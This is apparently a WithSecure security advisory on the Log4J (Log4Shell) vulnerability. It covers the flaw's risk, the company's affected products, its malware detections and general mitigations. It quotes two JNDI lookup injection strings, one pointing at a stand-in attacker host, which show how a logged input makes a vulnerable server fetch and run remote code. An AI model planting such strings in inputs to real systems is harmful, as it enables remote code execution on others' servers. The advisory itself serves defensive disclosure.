What you need to know about the Log4J vulnerability rocking the internet

A vulnerability in the Log4J library identified on Friday, December 10th is rocking software vendors and service providers around the globe. The weakness in the standardized method of handling log messages within software ranging from Microsoft’s Minecraft to ecommerce platforms is already under assault by attackers.

It’s almost impossible to describe the amount of risk that exists in vulnerable apps right now. If a user-controlled string targeting the vulnerability is logged, the exploit can be executed remotely. In the simplest terms, it allows an attacker to use this vulnerability to cause the target system to fetch and run code from a remote location. The second stage – what the malicious code does – is fully up to the attacker.

A ‘nearly perfect storm’

This nearly perfect storm is another reminder of how hard it to secure multiple layers of enterprise software. Legacy software, including older versions of Java, will force many organizations to develop their own patches or prevent them from patching immediately. Another complication comes from the challenge of correctly patching the logging functions of Log4j in real time, right when the threat of attack is so high and logging is so essential.

All recommended mitigations should be applied “immediately”, the Cybersecurity & Infrastructure Security Agency insisted in a blog post.

There’s not much that individual users can do, other than install updates for various online services as they become available. Companies and enterprises, however, will be working non-stop to provide those fixes, as they secure their own systems. And once exposure has been remedied, steps should be taken to assess if an active incident is underway within the affected systems.

Vulnerabilities almost anywhere

Finding an app that doesn’t use Log4J library may be harder than finding one that does. This omnipresence means attackers can go looking for vulnerabilities almost anywhere.

“Please don’t change your Tesla or iPhone name into ${jndi:ldap://url/a} unless you want unexpected user experience,” said Erka Koivunen, WithSecure’s Chief Information Security Officer, half-jokingly.

Using Log4J’s formatting language could trigger code in vulnerable applications around the globe. Just the mention of the phrase like “${jndi:ldap://attacker.com/pwnyourserver}” in a Minecraft chat in an unpatched system, for instance, could set off a security firestorm at Microsoft.

Are WithSecure products affected?

WithSecure has identified that the following products are affected by this vulnerability:

• WithSecure Policy Manager
  • Note: Only the Policy Manager Server component is affected. Standalone installations of Policy Manager Console are not affected.
• WithSecure Policy Manager Proxy
• WithSecure Endpoint Proxy
• WithSecure Elements Connector

Both Windows and Linux versions of these products should be considered affected. If your WithSecure product is exposed to the internet, you MUST immediately check and patch if needed.

How can I patch my WithSecure product?

WithSecure has created a deployable security patch for this vulnerability.  You can find those instructions and ongoing updates about this vulnerability here.

What protection does WithSecure provide against this vulnerability?

WithSecure Endpoint Protection (EPP) is continuously updated with detection for the latest local exploit files, but given the many ways in which exploitation can happen, this only covers part of the problem.

EPP detections will address any payload seen in post-exploitation phase as usual, and at this point in time, WithSecure has had the following detections in place that address some serious attack scenarios. These represents malicious payloads that we have seen ”in the wild” in connection with Log4j exploits.

• TR/Drop.Cobacis.AL
• TR/Rozena.wrdej
• TR/PShell.Agent.SWR
• TR/Coblat.G1
• TR/AD.MeterpreterSC.rywng

Many of these detections have been in available in WithSecure EPP for months already, meaning that customers are proactively protected from these payloads.

Other detections present may also help, as there are multiple ways to use the exploit. This list of useful detections will be updated as the situation evolves.

WithSecure Endpoint Detection and Response (EDR) capabilities are effective independently from this specific vulnerability and malicious activities, particularly those related to post-exploitation, will be detected as normal. We will keep adding new detections on the basis of what we see.

WithSecure Elements Vulnerability Management is being constantly updated to add detections, this page details the current status. It will be updated as new detections are available.

Check the general recommendations in the following section for further mitigations.

What steps should you take in general on all software, regardless of vendor?

Restrict network access, or limit it to trusted sites. If your system cannot connect to Internet to fetch the malicious code, the attack will fail.

Check regularly with vendors to see if there is information on patches and other mitigations related to vulnerabilities.

Consider WithSecure Elements Vulnerability Management, which can help identify vulnerable systems.

Consider WithSecure Elements Endpoint Protection or WithSecure Business Suite products, which can detect and patch vulnerable software on the system they are installed to.

NOTE: The “What protection does WithSecure provide against this vulnerability?” section was added on December 12 at 12:49 PM UTC and updated at 3:13 PM UTC and on December 14 at 12:05 PM UTC. “Are F-Secure products affected?” was updated on December 13 at 11:46 AM UTC.